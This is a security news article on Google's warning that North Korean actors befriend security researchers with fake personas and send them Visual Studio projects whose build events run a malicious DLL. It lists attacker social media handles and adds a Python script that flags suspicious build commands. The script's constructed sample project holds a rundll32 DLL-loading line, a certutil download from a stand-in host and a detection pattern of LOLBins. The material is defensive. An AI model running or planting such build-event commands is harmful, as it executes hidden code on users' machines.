
North Korean Cybercriminals Target Security Researchers: Google

Google has warned the security research community to be vigilant when contacted by unknown individuals on social media. According to Google, North Korean threat actors are using social engineering tactics to target security experts through fake social media accounts and a fake research blog.


Google’s Threat Analysis Group (TAG) has uncovered an ongoing campaign targeting security experts working on vulnerability research and development at various organizations. In an official release, the company stated that the threat actors behind the campaign are linked to a North Korean government-backed entity. Google warned the security research community that they may be targets and asked them to remain vigilant when connecting with unknown individuals on social networking platforms.

Attackers with Fake Personas

The attackers created multiple fake profiles on several platforms, including Twitter, Telegram, LinkedIn, Discord, and Keybase, to reach out to security professionals working on vulnerability research and disclosure. In addition, they set up a research blog containing write-ups and vulnerability analyses, which this report describes as illicitly obtained from legitimate security researchers, to build credibility and connect with the security research community.

“The actors established a research blog and multiple Twitter profiles to interact with potential targets. They’ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control,” Google said.

Hacker-controlled Websites and Social Media Accounts

Exploit Research Blog:

https://blog.br0vvnn[.]io

Twitter Handles:

  • https://twitter.com/br0vvnn
  • https://twitter.com/BrownSec3Labs
  • https://twitter.com/dev0exp
  • https://twitter.com/djokovic808
  • https://twitter.com/henya290
  • https://twitter.com/james0x40
  • https://twitter.com/m5t0r
  • https://twitter.com/mvp4p3r
  • https://twitter.com/tjrim91
  • https://twitter.com/z0x55g

LinkedIn:

  • https://www.linkedin.com/in/billy-brown-a6678b1b8/
  • https://www.linkedin.com/in/guo-zhang-b152721bb/
  • https://www.linkedin.com/in/hyungwoo-lee-6985501b9/
  • https://www.linkedin.com/in/linshuang-li-aa696391bb/
  • https://www.linkedin.com/in/rimmer-trajan-2806b21bb/

Keybase:

  • https://keybase.io/zhangguo

Telegram:

  • https://t.me/james50d

Social Engineering Attacks on Researchers

Google stated that the threat actors have been targeting security researchers with social engineering. The computers of several researchers were compromised after they visited the actors’ blog or followed links posted from the actor-controlled social media accounts.

“After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains,” Google added.
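The delivery mechanism Google describes above, a DLL run through Visual Studio Build Events, works because build events and Exec tasks in an MSBuild project execute arbitrary commands as soon as the project is built, with no prompt. The following script is an added example written for this page, not Google TAG’s code or an artifact from the campaign: it parses a project file, pulls out every command the build would run, and flags the ones that invoke LOLBins, load a DLL, or fetch from a URL. The sample .vcxproj and the DLL name Helper.dll are constructed for the example.

```python
"""Triage a Visual Studio / MSBuild project file for build-event commands.

Added example for this page (not Google TAG's code). Build events
(PreBuildEvent, PreLinkEvent, PostBuildEvent, CustomBuildStep) and <Exec>
tasks run shell commands when the project is built, which is how the DLL
described above was launched. The project below is constructed; Helper.dll
is a hypothetical name.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample .vcxproj: one benign event, one event that loads a DLL
# shipped with the project, and one Exec task that downloads a payload.
SAMPLE_VCXPROJ = """<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <ClCompile Include="poc.cpp" />
  </ItemGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <PostBuildEvent>
      <Command>rundll32.exe "$(TargetDir)Helper.dll",Run</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PreBuildEvent>
      <Command>echo Building $(ProjectName)</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="AfterBuild">
    <Exec Command="certutil -urlcache -f https://example.invalid/drop.bin drop.bin" />
  </Target>
</Project>
"""

# MSBuild elements whose <Command> child is executed during the build.
EVENT_TAGS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent", "CustomBuildStep"}

# LOLBins and indicators that have no business in a proof-of-concept's build step.
SUSPICIOUS = re.compile(
    r"rundll32|regsvr32|mshta|wscript|cscript|certutil|bitsadmin|powershell"
    r"|\.dll\b|https?://",
    re.IGNORECASE,
)


def _local(tag: str) -> str:
    """Strip the XML namespace: .vcxproj files use the MSBuild namespace,
    SDK-style projects omit it, and both must match."""
    return tag.rsplit("}", 1)[-1]


def extract_build_commands(project_xml: str) -> list[tuple[str, str]]:
    """Return (element, command) pairs for every command the build would run."""
    root = ET.fromstring(project_xml)
    commands = []
    for el in root.iter():
        name = _local(el.tag)
        if name in EVENT_TAGS:
            for child in el:
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    commands.append((name, child.text.strip()))
        elif name == "Exec":
            cmd = el.get("Command", "").strip()
            if cmd:
                commands.append(("Exec", cmd))
    return commands


def triage(project_xml: str) -> list[tuple[str, str, bool]]:
    """Tag each build command with whether it matches a suspicious pattern."""
    return [(el, cmd, bool(SUSPICIOUS.search(cmd)))
            for el, cmd in extract_build_commands(project_xml)]


def flagged(project_xml: str) -> list[str]:
    """Only the commands a reviewer should read before pressing Build."""
    return [cmd for _, cmd, hit in triage(project_xml) if hit]


if __name__ == "__main__":
    for element, command, hit in triage(SAMPLE_VCXPROJ):
        print(f"[{'SUSPICIOUS' if hit else 'ok'}] {element}: {command}")
```

Run it against a .vcxproj received from a stranger before opening the solution in Visual Studio, and treat any flagged line as reason to build only in an isolated VM. The script covers the project file itself; MSBuild also honours Directory.Build.props, Directory.Build.targets and any file pulled in through an Import element, so those need the same review, and a clean scan is not proof the project is harmless.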